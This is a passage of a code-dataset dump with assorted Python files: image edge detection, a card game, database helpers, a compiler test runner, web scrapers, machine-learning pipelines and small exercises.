%(message)s',\n 'keep': 5,\n 'level': 'debug',\n 'limit': 1000000\n}\n","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"49446851","text":"import cv2\nfrom matplotlib import pyplot as plt \n\nsrc = cv2.imread(\"src_edge.jpg\")\n\n_, axs = plt.subplots(1, 4)\n\n# show src image\nimg = cv2.cvtColor(src, cv2.COLOR_BGR2RGB)\naxs[0].imshow(img)\n\n# preprocess by blurring and grayscale\nimg = cv2.GaussianBlur(src, (7, 7), 0)\nimg = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\naxs[1].imshow(cv2.cvtColor(img, cv2.COLOR_GRAY2RGB))\n\n# find binary image with thresholding\n_, img_thresh = cv2.threshold(img, 80, 255, cv2.THRESH_BINARY)\naxs[2].imshow(cv2.cvtColor(img_thresh, cv2.COLOR_GRAY2RGB))\n\n# find binary image with edges\nimg_canny = cv2.Canny(img, threshold1=90, threshold2=110)\naxs[3].imshow(cv2.cvtColor(img_canny, cv2.COLOR_GRAY2RGB))\n\nplt.show()\n","sub_path":"day3-1/code/python/02_edge.py","file_name":"02_edge.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"247724055","text":"\"\"\"\nContains\n - Rules\n - Applies Rules to Players\n - Deck changes happen here\n\"\"\"\nfrom player import Player\nfrom deck import Deck\n\nclass War():\n\n def __init__(self, \n player1_name='Gambit',\n player1_win_slogan='Great game!',\n player1_lose_slogan='Oh no! My mortgage!',\n player2_name='Cyclops',\n player2_win_slogan='Excellent game!',\n player2_lose_slogan='Oh no! Rouge!'):\n self.player1 = Player(name=player1_name,\n win_slogan=player1_win_slogan,\n lose_slogan=player1_lose_slogan)\n self.player2 = Player(name=player2_name,\n win_slogan=player2_win_slogan,\n lose_slogan=player2_lose_slogan)\n self.deck = Deck()\n self.deal()\n self.middle_cards = []\n self.round_number = 0\n\n def deal(self):\n player1_hand = self.deck.cards[0::2]\n player2_hand = self.deck.cards[1::2]\n self.player1.hand = player1_hand\n self.player2.hand = player2_hand\n print(\"Cards have been dealt.\")\n pass\n \n\n def add_to_middle(self, cards):\n self.middle_cards.extend(cards)\n\n\n def reset_middle(self):\n self.middle_cards = []\n\n def play_round(self):\n self.round_number += 1\n print('Round Number = {}'.format(self.round_number))\n p1_card = self.player1.draw_one()\n p2_card = self.player2.draw_one()\n self.add_to_middle(cards=[p1_card,p2_card])\n print(\"Playing Round Number {}.\".format(self.round_number))\n print(p1_card, p2_card)\n if p1_card > p2_card:\n self.player1.take_cards(cards=self.middle_cards)\n print(\"Player 1 wins this round!\")\n self.reset_middle()\n elif p2_card > p1_card:\n self.player2.take_cards(cards=self.middle_cards)\n print(\"Player 2 wins this round!)\")\n self.reset_middle()\n else:\n print(\"War!\")\n self.play_war()\n\n\n def play_war(self):\n #draw 2 cards and add to the middle\n print(\"WAR!!!!!!!!!\")\n p1_facedown = self.player1.draw_one()\n p2_facedown = self.player2.draw_one()\n self.add_to_middle([p1_facedown, p2_facedown])\n self.play_round()\n pass\n \n\n def play_game(self):\n while self.player1.hand and self.player2.hand:\n self.play_round()\n print(\"GAME OVER, MAN!!!\")\n if self.player1.hand:\n print(\"{} Wins!\".format(self.player1.name))\n else:\n print(\"{} Wins!\".format(self.player2.name))\n pass\n\n \n\n\n# Testing to make sure the code works\nif __name__==\"__main__\":\n war = War()\n print(war.deck.cards)\n print(war.player1.hand)\n print(war.player2.hand)\n war.play_game()","sub_path":"war.py","file_name":"war.py","file_ext":"py","file_size_in_byte":2887,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"492678703","text":"import MySQLdb.cursors\n\nclass EventEmotion:\n def __init__(self, eventemotion_id, event_id, emotion_id, display_index):\n self.eventemotion_id = eventemotion_id\n self.event_id = event_id\n self.emotion_id = emotion_id\n self.display_index = display_index\n\ndef create(db, event_id, emotion_id, display_index):\n query_str = 'INSERT INTO {0} ({1}, {2}, {3}) values (%s, %s, %s)'.format(TABLE_NAME, FIELD_EVENTID, FIELD_EMOTIONID, FIELD_DISPLAYINDEX)\n curs = db.cursor()\n curs.execute(query_str, [event_id, emotion_id, display_index])\n eventemotion_id = curs.lastrowid\n db.commit()\n return EventEmotion(eventemotion_id, event_id, emotion_id, display_index)\n\ndef get_all_by_x(db, field, x):\n query_str = 'SELECT {0}, {1}, {2}, {3} FROM {4} WHERE {5}=%s'.format(FIELD_EVENTEMOTIONID, FIELD_EVENTID, FIELD_EMOTIONID, FIELD_DISPLAYINDEX, TABLE_NAME, field)\n cur = db.cursor()\n cur.execute(query_str, [x])\n entries = [EventEmotion(row[0], row[1], row[2], int(row[3])) for row in cur.fetchall()]\n return entries\n\ndef get_all_by_eventid(db, event_id):\n entries = get_all_by_x(db, FIELD_EVENTID, event_id)\n return entries\n\ndef delete_by_x(db, field, x):\n query_str = 'DELETE FROM {0} WHERE {1}=%s'.format(TABLE_NAME, field)\n db.cursor().execute(query_str, [x])\n db.commit()\n\ndef delete(db, eventemotion_id):\n delete_by_x(db, FIELD_EVENTEMOTIONID, eventemotion_id)\n\ndef delete_all_for_event(db, event_id):\n delete_by_x(db, FIELD_EVENTID, event_id)\n\n##################\n# DB Definitions #\n##################\nTABLE_NAME = 'eventemotions'\nFIELD_EVENTEMOTIONID = 'eventemotion_id'\nFIELD_EVENTID = 'event_id'\nFIELD_EMOTIONID = 'emotion_id'\nFIELD_DISPLAYINDEX = 'display_index'\n","sub_path":"ru_eventemotion.py","file_name":"ru_eventemotion.py","file_ext":"py","file_size_in_byte":1739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"97440809","text":"#\n# Copyright (c) [2021] Huawei Technologies Co.,Ltd.All rights reserved.\n#\n# OpenArkCompiler is licensed under Mulan PSL v2.\n# You can use this software according to the terms and conditions of the Mulan PSL v2.\n#\n# http://license.coscl.org.cn/MulanPSL2\n#\n# THIS SOFTWARE IS PROVIDED ON AN \"AS IS\" BASIS, WITHOUT WARRANTIES OF ANY KIND, EITHER\n# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO NON-INFRINGEMENT, MERCHANTABILITY OR\n# FIT FOR A PARTICULAR PURPOSE.\n# See the Mulan PSL v2 for more details.\n#\n\nimport os\nimport sys\n\nfrom case.component import Component\nfrom env_var import EnvVar\nfrom case.case_executor.command_executor.shell import Shell\n\n\nclass OriginExecute(Component):\n\n def __init__(self, input: dict):\n self.case_name = input[\"case_name\"]\n self.command_suite = input[\"command_suite\"]\n self.detail = input[\"detail\"]\n self.result_suite = {\"PASSED\": set(), \"FAILED\": set(), \"TIMEOUT\": set()}\n\n def execute(self):\n for mode in self.command_suite.keys():\n case = SingleCaseExecutor(self.case_name, mode, self.command_suite[mode], self.detail)\n case.execute()\n result = case.get_result()\n self.result_suite[result].add(mode)\n\n def get_output(self):\n return {self.case_name: self.result_suite}\n\nclass SingleCaseExecutor(object):\n\n def __init__(self, case_name: str, mode: str, command_list: list, detail: bool):\n self.case_name = case_name\n self.mode = mode\n self.command_list = command_list\n self.detail = detail\n self.case_path = os.path.join(EnvVar.TEST_SUITE_ROOT, self.case_name)\n self.result = \"\"\n\n def execute(self):\n passed, passed_in_color = \"PASSED\", \"\\033[1;32mPASSED\\033[0m\"\n failed, failed_in_color = \"FAILED\", \"\\033[1;31mFAILED\\033[0m\"\n timeout, timeout_in_color = \"TIMEOUT\", \"\\033[1;33mTIMEOUT\\033[0m\"\n self.result, result_in_color = passed, passed_in_color\n if self.detail:\n for command in self.command_list:\n print(\"\\033[1;32m[[ CMD : \" + command + \" ]]\\033[0m\")\n exe = Shell(command=command, workdir=self.case_path, timeout=5000)\n exe.execute()\n com_out, com_err, return_code = exe.get_output()\n if com_out is not None and len(com_out) != 0:\n print(com_out)\n if com_err is not None and len(com_err) != 0:\n print(com_err)\n if return_code == 124:\n print(\"ERROR : TIMEOUT !\")\n self.result, result_in_color = timeout, timeout_in_color\n break\n elif return_code != 0:\n print(\"ERROR : FAILED !\")\n self.result, result_in_color = failed, failed_in_color\n break\n else:\n log_file = open(os.path.join(self.case_path, self.mode + \"_run.log\"), \"w+\")\n for command in self.command_list:\n log_file.write(\"[[ CMD : \" + command + \" ]]\\n\")\n exe = Shell(command=command, workdir=self.case_path, timeout=5000)\n exe.execute()\n com_out, com_err, return_code = exe.get_output()\n if com_out is not None and len(com_out) != 0:\n log_file.write(com_out + \"\\n\")\n if com_err is not None and len(com_err) != 0:\n log_file.write(com_err + \"\\n\")\n if return_code == 124:\n log_file.write(\"ERROR : TIMEOUT !\\n\")\n self.result, result_in_color = timeout, timeout_in_color\n break\n elif exe.return_code != 0:\n log_file.write(\"ERROR : FAILED !\\n\")\n self.result, result_in_color = failed, failed_in_color\n break\n print(self.case_name + \" \" + self.mode + \" \" + result_in_color)\n sys.stdout.flush()\n\n def get_result(self):\n return self.result\n","sub_path":"testsuite/driver/src/case/case_executor/origin_execute.py","file_name":"origin_execute.py","file_ext":"py","file_size_in_byte":4020,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"569988965","text":"from flask import Blueprint, render_template, redirect, request\nfrom services.spotify import authorizationURL as spotifyAuthorizationURL\nfrom services.spotify import parseAuthorizationResponse as spotifyParseAuthorizationResponse\nfrom services.spotify import requestAccessAndRefreshTokens as spotifyRequestTokens\n\nauthorization = Blueprint('authorization', __name__)\n\n@authorization.route('/spotify')\ndef spotifyAuthorization():\n\treturn redirect(spotifyAuthorizationURL()) #allow user to login to their account, granting access\n\n# This is the url that the user is redirected to upon the user (not) permitting the application to get access\n# to their account. The status of the authorization is embedded in the url.\n# On success, the auth code will be used to request access and refresh tokens\n# Otherwise, the error message is displayed\n@authorization.route('/spotify/callback')\ndef spotifyAuthorizationCallback():\n\tsuccess, auth_token =spotifyParseAuthorizationResponse()\n\tif success is True:\n\t\t#request refresh and access tokens\n\t\ttokens = spotifyRequestTokens(auth_token)\n\n\telse:\n\t\trender_template('spotify_access_denied.html', error=auth_token)\t#auth_token will contain the error type","sub_path":"views/authorization.py","file_name":"authorization.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"619202724","text":"from typing import List, Optional\n\nimport pandas as pd\nfrom bs4 import BeautifulSoup\n\nfrom . import cache\nfrom .datasources.fangraphs import fg_team_batting_data\nfrom .datasources.bref import BRefSession\n\nsession = BRefSession()\n\n# This is just a pass through for the new, more configurable function\nteam_batting = fg_team_batting_data\n\n\n@cache.df_cache()\ndef team_batting_bref(team: str, start_season: int, end_season: Optional[int]=None) -> pd.DataFrame:\n \"\"\"\n Get season-level Batting Statistics for Specific Team (from Baseball-Reference)\n\n ARGUMENTS:\n team : str : The Team Abbreviation (i.e. 'NYY' for Yankees) of the Team you want data for\n start_season : int : first season you want data for (or the only season if you do not specify an end_season)\n end_season : int : final season you want data for\n \"\"\"\n if start_season is None:\n raise ValueError(\n \"You need to provide at least one season to collect data for. Try team_batting_bref(season) or team_batting_bref(start_season, end_season).\"\n )\n if end_season is None:\n end_season = start_season\n\n url = \"https://www.baseball-reference.com/teams/{}\".format(team)\n\n raw_data = []\n headings: Optional[List[str]] = None\n for season in range(start_season, end_season+1):\n print(\"Getting Batting Data: {} {}\".format(season, team))\n stats_url = \"{}/{}.shtml\".format(url, season)\n response = session.get(stats_url)\n soup = BeautifulSoup(response.content, 'html.parser')\n\n table = soup.find_all('table', {'class': 'sortable stats_table'})[0]\n\n if headings is None:\n headings = [row.text.strip() for row in table.find_all('th')[1:28]]\n\n rows = table.find_all('tr')\n for row in rows:\n cols = row.find_all('td')\n cols = [ele.text.strip() for ele in cols]\n cols = [col.replace('*', '').replace('#', '') for col in cols] # Removes '*' and '#' from some names\n cols = [col for col in cols if 'Totals' not in col and 'NL teams' not in col and 'AL teams' not in col] # Removes Team Totals and other rows\n cols.insert(2, season)\n raw_data.append([ele for ele in cols[0:]])\n\n assert headings is not None\n headings.insert(2, \"Year\")\n data = pd.DataFrame(data=raw_data, columns=headings) # [:-5] # -5 to remove Team Totals and other rows\n data = data.dropna() # Removes Row of All Nones\n\n return data\n","sub_path":"pybaseball/team_batting.py","file_name":"team_batting.py","file_ext":"py","file_size_in_byte":2462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"257572759","text":"\n\nfrom xai.brain.wordbase.verbs._defraud import _DEFRAUD\n\n#calss header\nclass _DEFRAUDS(_DEFRAUD, ):\n\tdef __init__(self,): \n\t\t_DEFRAUD.__init__(self)\n\t\tself.name = \"DEFRAUDS\"\n\t\tself.specie = 'verbs'\n\t\tself.basic = \"defraud\"\n\t\tself.jsondata = {}\n","sub_path":"xai/brain/wordbase/verbs/_defrauds.py","file_name":"_defrauds.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"102944319","text":"import numpy as np\nimport pandas as pd\nimport datetime\nimport sys\nfrom datetime import datetime\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.tree import DecisionTreeRegressor\nfrom sklearn.decomposition import NMF\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.model_selection import ParameterGrid\n\nclass NMF_Model(object):\n\n def __init__(self, X, y, seed,\n cv=70,\n n_comp=[5, 6, 7], # 2-8 components were first tried before narrowing down the parameter search space to between 5 and 7 after results from an initial run\n alpha=[0.5, 1, 2],\n solver=[\"cd\"]\n ):\n self.results_name = None\n self.X = X\n self.y = y\n self.seed = seed\n self.cv = cv\n self.n_comp = n_comp\n self.alpha = alpha\n self.solver = solver\n self.pipe = None\n\n self.param_grid = {\"nmf__solver\": self.solver,\n \"nmf__n_components\": self.n_comp,\n \"nmf__alpha\": self.alpha\n }\n\n self.TESTparam_grid = {\"nmf__solver\": self.solver,\n \"nmf__n_components\": [7],\n \"nmf__alpha\": [2]}\n\n def change_y(self):\n if isinstance(self.y, pd.DataFrame):\n self.y = np.array(self.y['SLAVERY'])\n return\n\n def print_start(self):\n num_fits = self.num_fits\n num_iterations = self.num_iterations\n grid_print = self.grid_print\n f = self.f\n print(\"The number of fits =\" + str(num_fits), file=f)\n print(\"The number of iterations =\" + str(num_iterations), file=f)\n print(\"Params iterating over = \" + str(list(grid_print.items())), file=f)\n f.flush()\n\n def print_best_params(self, error, params):\n print(\"UPDATE MAE: \" + str(error), file=self.f)\n print(\"UPDATE Best params = \" + str(params), file=self.f)\n self.f.flush()\n\n def print_nrows(self, p, params, param_start_time_n):\n print(\"Fit num: \" + str(p) + \"/\" + str(self.num_fits) +\n \"...\" + str(np.round((p / self.num_fits) * 100, 0)) + \"%\", file=self.f)\n param_set_time_n = datetime.now() - param_start_time_n\n print(\"Time taken: \" + str(param_set_time_n), file=self.f)\n print(\"Current params = \" + str(params), file=self.f)\n self.f.flush()\n\n def print_end_results(self, params, runtime):\n print(\"==== RUN: \" + str(datetime.now()) + \" ====\"\n , file=open(self.results_name, \"w\"))\n print(\"RESULTS MAE: \" + str(params['Error']), file=open(self.results_name, \"a\"))\n print(\"RESULTS Best params = \" + str(params['Params']), file=open(self.results_name, \"a\"))\n print(\"RUNTIME: \" + str(runtime), file=open(self.results_name, \"a\"))\n sys.stdout.close()\n\n def update_rash_params(self, error, params):\n self.rash_params[error] = params\n\n def update_best_params(self, error, params):\n self.Results['Params'] = params\n self.Results['Error'] = error\n\n def LOOCV(self, verbose_name, rash_threshold, rash_results_name, n_folds, print_every_nrows,\n test):\n n = self.X.shape[0]\n self.rash_params = {}\n self.Results = {}\n current_mae = 1\n p = 0\n\n # If string index's, need to be re-set:\n self.X.reset_index(inplace=True, drop=True)\n self.y.reset_index(inplace=True, drop=True)\n\n grid_start = datetime.now()\n self.f = open(verbose_name, \"w\")\n print(str(grid_start), file=self.f)\n param_start_time_n = datetime.now()\n\n if test == True:\n self.grid_print = self.TESTparam_grid.items()\n self.grid = ParameterGrid(self.TESTparam_grid)\n else:\n self.grid_print = self.param_grid\n self.grid = ParameterGrid(self.param_grid)\n\n self.num_fits = len(list(self.grid))\n self.num_iterations = self.num_fits * n_folds\n self.print_start()\n\n for param in list(self.grid):\n err_fold_list = []\n self.set_pipeline(**param)\n\n for i in range(0, n_folds):\n X_test_fold = pd.DataFrame(self.X.iloc[i, :]).transpose()\n X_train_folds = self.X.drop(i, axis=0)\n y_test_fold = self.y.iloc[i, :]\n y_train_folds = self.y.drop(i, axis=0)\n\n m1 = self.pipe.fit(X_train_folds, y_train_folds.values.ravel())\n pred = m1.predict(X_test_fold)\n err = abs(y_test_fold.values - pred)\n err_fold_list.append(err[0])\n self.f.flush()\n\n param_mae = pd.Series(err_fold_list).mean()\n self.f.flush()\n\n if param_mae <= rash_threshold:\n self.update_rash_params(error=param_mae, params=param)\n\n if param_mae <= current_mae:\n current_mae = param_mae\n self.update_best_params(error=param_mae, params=param)\n self.print_best_params(error=param_mae, params=param)\n\n # Print where at in grid search every n_rows:\n p = p + 1\n if p % print_every_nrows == 0:\n self.print_nrows(p=p, params=param, param_start_time_n=param_start_time_n)\n\n # Save Rashomon Set parameters every nrows:\n Rashomon_models = pd.DataFrame.from_dict(self.rash_params, orient='index')\n with open(rash_results_name, 'w') as r_file:\n Rashomon_models.to_csv(r_file)\n r_file.flush()\n\n # Save final set of Rashomon Set params:\n if p == self.num_fits:\n Rashomon_models = pd.DataFrame.from_dict(self.rash_params, orient='index')\n with open(rash_results_name, 'w') as r_file:\n Rashomon_models.to_csv(r_file)\n r_file.flush()\n\n # Calculate and print runtime:\n Runtime = datetime.now() - grid_start\n print(\"Total Run time: \" + str(Runtime), file=self.f)\n self.f.flush()\n self.f.close()\n\n self.print_end_results(params=self.Results, runtime=Runtime)\n\n return\n\n def set_pipeline(self, **kwargs):\n return\n\n\nclass NMF_LM(NMF_Model):\n\n def __init__(self, X, y, seed, nmf_max_iter, tol, results_name):\n super().__init__(X, y, seed)\n self.results_name = results_name\n self.tol = tol\n self.nmf_max_iter = nmf_max_iter\n self.seed = seed\n\n self.param_grid[\"nmf__random_state\"] = self.seed\n return\n\n def set_pipeline(self, nmf__solver, nmf__n_components, nmf__alpha, nmf__random_state):\n self.pipe = Pipeline([\n (\"nmf\", NMF(init=\"nndsvd\", solver=nmf__solver, max_iter=self.nmf_max_iter,\n tol=self.tol,\n n_components=nmf__n_components, alpha=nmf__alpha,\n verbose=0, random_state=nmf__random_state)),\n (\"lm\", LinearRegression())])\n\n\nclass NMF_DT(NMF_Model):\n\n def __init__(self, X, y, seed, nmf_max_iter, tol, results_name,\n min_samples_split=[2, 3, 4],\n max_depth=[3, 4, 5, 6]):\n super().__init__(X, y, seed)\n self.results_name = results_name\n self.nmf_max_iter = nmf_max_iter\n self.tol = tol\n\n self.param_grid[\"dt__random_state\"] = seed\n self.param_grid[\"dt__min_samples_split\"] = min_samples_split\n self.param_grid[\"dt__max_depth\"] = max_depth\n\n self.TESTparam_grid[\"dt__random_state\"] = self.seed\n self.TESTparam_grid[\"dt__min_samples_split\"] = [3]\n self.TESTparam_grid[\"dt__max_depth\"] = [4]\n\n return\n\n\nclass max_features_is_n_features(NMF_DT):\n def __init__(self, X, y, seed, nmf_max_iter, tol, results_name):\n super().__init__(X, y, seed, nmf_max_iter, tol, results_name)\n return\n\n def set_pipeline(self, nmf__solver, nmf__n_components, nmf__alpha, dt__random_state,\n dt__min_samples_split, dt__max_depth):\n self.pipe = Pipeline([\n (\"nmf\", NMF(init=\"nndsvd\", solver=nmf__solver, max_iter=self.nmf_max_iter,\n tol=self.tol,\n n_components=nmf__n_components, alpha=nmf__alpha,\n verbose=0, random_state=dt__random_state)),\n (\"dt\", DecisionTreeRegressor(random_state=dt__random_state,\n min_samples_split=dt__min_samples_split,\n max_depth=dt__max_depth))])\n\n\nclass max_features_as_param(NMF_DT):\n def __init__(self, X, y, seed, nmf_max_iter, tol, results_name, max_features=[0.3, 0.5, 0.7]):\n super().__init__(X, y, seed, nmf_max_iter, tol, results_name)\n self.results_name = results_name\n self.nmf_max_iter = nmf_max_iter\n self.tol = tol\n\n self.param_grid['dt__max_features'] = max_features\n self.TESTparam_grid['dt__max_features'] = [0.5]\n\n return\n\n def set_pipeline(self, nmf__solver, nmf__n_components, nmf__alpha, dt__random_state,\n dt__min_samples_split, dt__max_depth, dt__max_features):\n self.pipe = Pipeline([\n (\"nmf\", NMF(init=\"nndsvd\", solver=nmf__solver, max_iter=self.nmf_max_iter,\n tol=self.tol,\n n_components=nmf__n_components, alpha=nmf__alpha,\n verbose=0, random_state=dt__random_state)),\n (\"dt\", DecisionTreeRegressor(random_state=dt__random_state,\n min_samples_split=dt__min_samples_split,\n max_depth=dt__max_depth,\n max_features=dt__max_features))])\n return\n\n\nclass NMF_RF(NMF_Model):\n\n def __init__(self, X, y, seed, nmf_max_iter, tol, results_name,\n min_samples_split=[2, 3],\n max_depth=[4, 5],\n max_features=[0.3, 0.5],\n n_estimators=[30, 50]\n ):\n super().__init__(X, y, seed)\n\n self.results_name = results_name\n self.nmf_max_iter = nmf_max_iter\n self.tol = tol\n\n self.param_grid[\"rf__random_state\"] = self.seed\n self.param_grid[\"rf__min_samples_split\"] = min_samples_split\n self.param_grid[\"rf__max_depth\"] = max_depth\n self.param_grid[\"rf__max_features\"] = max_features\n self.param_grid[\"rf__n_estimators\"] = n_estimators\n\n self.TESTparam_grid[\"rf__random_state\"] = self.seed\n self.TESTparam_grid[\"rf__min_samples_split\"] = [3]\n self.TESTparam_grid[\"rf__max_depth\"] = [4]\n self.TESTparam_grid[\"rf__max_features\"] = [0.3]\n self.TESTparam_grid[\"rf__n_estimators\"] = [60]\n\n return\n\n def set_pipeline(self, nmf__solver, nmf__n_components, nmf__alpha, rf__random_state,\n rf__min_samples_split, rf__max_depth, rf__max_features, rf__n_estimators):\n self.pipe = Pipeline([\n (\"nmf\", NMF(init=\"nndsvd\", solver=nmf__solver, max_iter=self.nmf_max_iter,\n tol=self.tol,\n n_components=nmf__n_components, alpha=nmf__alpha,\n verbose=0, random_state=rf__random_state)),\n (\"rf\", RandomForestRegressor(random_state=rf__random_state,\n min_samples_split=rf__min_samples_split,\n max_depth=rf__max_depth,\n max_features=rf__max_features,\n n_estimators=rf__n_estimators))])\n return\n\n\n\n","sub_path":"Model_Classes/NMF_MODEL.py","file_name":"NMF_MODEL.py","file_ext":"py","file_size_in_byte":11755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"179153111","text":"# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport sys\nsys.path.append('..')\n\nfrom program_config import TensorConfig, ProgramConfig, OpConfig, CxxConfig, TargetType, PrecisionType, DataLayoutType, Place\nimport numpy as np\nfrom functools import partial\nfrom typing import Optional, List, Callable, Dict, Any, Set\nimport unittest\nimport hypothesis\nimport hypothesis.strategies as st\n\n\ndef sample_program_configs(draw):\n in_shape = draw(\n st.lists(\n st.integers(\n min_value=2, max_value=6), min_size=4, max_size=4))\n axis_data = draw(st.integers(min_value=0, max_value=3))\n use_stack_data = draw(st.booleans())\n\n def generate_input_I_data():\n return np.random.randint(0, 1, [1]).astype(np.int64)\n\n write_to_array_op = OpConfig(\n type=\"write_to_array\",\n inputs={\"X\": [\"X_data\"],\n \"I\": [\"I_data\"]},\n outputs={\"Out\": [\"middle_data\"]},\n attrs={})\n\n tensor_array_to_tensor_op = OpConfig(\n type=\"tensor_array_to_tensor\",\n inputs={\"X\": [\"middle_data\"]},\n outputs={\"Out\": [\"output_data\"],\n \"OutIndex\": [\"OutIndex_data\"]},\n attrs={\n \"axis\": 1,\n \"use_stack\": False,\n })\n program_config = ProgramConfig(\n ops=[write_to_array_op, tensor_array_to_tensor_op],\n weights={},\n inputs={\n \"X_data\": TensorConfig(shape=in_shape),\n \"I_data\": TensorConfig(data_gen=partial(generate_input_I_data))\n },\n outputs=[\"output_data\", \"OutIndex_data\"])\n return program_config\n","sub_path":"lite/tests/unittest_py/op/common/test_tensor_array_to_tensor_op_base.py","file_name":"test_tensor_array_to_tensor_op_base.py","file_ext":"py","file_size_in_byte":2147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"328959840","text":"import requests\r\nfrom lxml import etree\r\n\r\n\r\nheaders = {\r\n 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36'\r\n}\r\n\r\nBASE_URL = 'https://hr.tencent.com/'\r\n\r\n\r\n# 抓取每条招聘信息的的url\r\ndef get_detail_url():\r\n keyword = input(\"请输入职位关键字:\")\r\n pn = input(\"请输入要抓取的页数:\")\r\n for i in range(int(pn)):\r\n url = 'https://hr.tencent.com/position.php?lid=&tid=&keywords={}&start={}#a'.format(keyword,int(pn)*10)\r\n response = requests.get(url,headers=headers).text\r\n html = etree.HTML(response,parser=etree.HTMLParser())\r\n detail_urls = html.xpath(\"//table[@class='tablelist']//a/@href\")\r\n urls = []\r\n for x in detail_urls:\r\n url = BASE_URL+x\r\n urls.append(url)\r\n return urls\r\n\r\n\r\n# 获取职位信息\r\ndef parse_detail(url):\r\n info = {}\r\n response = requests.get(url,headers=headers).text\r\n html = etree.HTML(response,parser=etree.HTMLParser())\r\n title = html.xpath(\"//table[@class='tablelist textl']//tr[@class='h']/td/text()\") # 获取职位名称\r\n info['title'] = title\r\n category_name = html.xpath(\"//table[@class='tablelist textl']//tr[@class='c bottomline']/td/span/text()\")\r\n category = html.xpath(\"//table[@class='tablelist textl']//tr[@class='c bottomline']/td/text()\") # 获取职位类别\r\n for i in range(len(category_name)):\r\n info[category_name[i]] = category[i]\r\n job_duties_requires = html.xpath(\"//table[@class='tablelist textl']//tr[@class='c']//div[@class='lightblue']/text()\")\r\n duty_detail = html.xpath(\"//table[@class='tablelist textl']//tr[@class='c'][position()<2]//ul/li/text()\") # 获取工作职责\r\n require_detail = html.xpath(\"//table[@class='tablelist textl']//tr[@class='c'][position()>1][position()<3]//ul/li/text()\") # 获取工作要求\r\n info[job_duties_requires[0]] = duty_detail\r\n info[job_duties_requires[1]] = require_detail\r\n return info\r\n\r\n\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n detail_urls = get_detail_url()\r\n for url in detail_urls:\r\n jobs = parse_detail(url)\r\n print(\"*\"*30)\r\n for key,values in jobs.items():\r\n print(key + \":\", end=\"\")\r\n print(values)\r\n print(\"*\" * 30)\r\n print()","sub_path":"tencent.py","file_name":"tencent.py","file_ext":"py","file_size_in_byte":2342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"92126366","text":"def fibonacci(n):\n \"\"\"\n 피보나치 수열을 계산하는 함수를 작성하시오. 피보나치 수의 정의는 아래와 같다.\n\n f(n) = 0 if n = 0\n f(n) = 1 if n = 1\n f(n) = f(n-1) + f(n-2) if n > 1\n\n 단 n에는 0 이상의 정수가 입력되는 것으로 가정하라.\n \"\"\"\n\n n0 = 0\n n1 = 1\n tmp = 0\n result = 0\n\n if n == 0:\n return n0\n elif n == 1:\n return n1\n\n result = 1\n\n for _ in range(2,n):\n tmp = result\n result = result + tmp\n\n return result\n\n\n\n # if n == 0:\n # return 0\n # elif n == 1:\n # return 1\n # return fibonacci(n - 1) + fibonacci(n - 2)\n\n\nfor i in range(11):\n print(\"f(%d) = %d\" % (i, fibonacci(i)))\n\n\"\"\" 수행 예: \nf(0) = 0\nf(1) = 1\nf(2) = 1\nf(3) = 2\nf(4) = 3\nf(5) = 5\nf(6) = 8\nf(7) = 13\nf(8) = 21\nf(9) = 34\nf(10) = 55\n\"\"\"\n","sub_path":"MJUSchoolClass/CodingTest2/homework1/fibonacci.py","file_name":"fibonacci.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"333761385","text":"import numpy as np\nimport scipy.integrate as integrate\nfrom scipy.optimize import minimize\nimport numbers\nimport typing\nfrom tqdm import tqdm\nfrom echem.core.useful_funcs import nearest_array_index, ClassMethods\nE_F_SHE_VAC = -4.5 # Fermi Energy of Standard Hydrogen Electrode with respect to vacuum\n\n\nclass GM(ClassMethods):\n \"\"\"This class calculates the final Fermi and Redox species distributions according\n to the Gerischer-Marcus formalism.\n\n Parameters:\n -----------\n DOS: np.ndarray, optional\n The values of DOS in 1D numpy array. If not specified values will be taken from saved data.\n\n E: np.ndarray, optional\n The corresponding to the DOS energy mesh. If not specified values will be taken from saved data.\n\n efermi: np.ndarray. optional\n System Fermi level. If not specified values will be taken from saved data.\n\n vacuum_lvl: np.ndarray, optional\n System vacuum level. If not specified values will be taken from saved data.\n \"\"\"\n def __init__(self, path_to_data='Saved_data', DOS=None, E=None, efermi=None, vacuum_lvl=None):\n # variables that might be defined through __init__ function\n self.E = E\n self.DOS = DOS\n self.efermi = efermi\n self.vacuum_lvl = 